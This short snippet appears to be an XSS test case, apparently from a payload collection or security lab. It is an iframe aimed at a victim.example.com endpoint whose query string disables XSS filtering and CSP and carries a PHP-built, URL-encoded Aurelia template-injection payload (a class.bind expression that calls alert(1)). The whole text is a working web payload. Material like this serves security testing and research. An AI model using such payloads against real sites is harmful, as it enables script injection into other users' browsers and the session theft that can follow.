<iframe src="https://victim.example.com/repo/waf/modsecurity/repo/csp/sd/aurelia.php?xssfilter=0&csp=0&inj=<?php 
$payload = <<<'PAYLOAD'
<div
class.bind=bindingContext.ownerDocument.defaultView.alert(1)>
PAYLOAD;
echo urlencode($payload);
?>"></iframe>
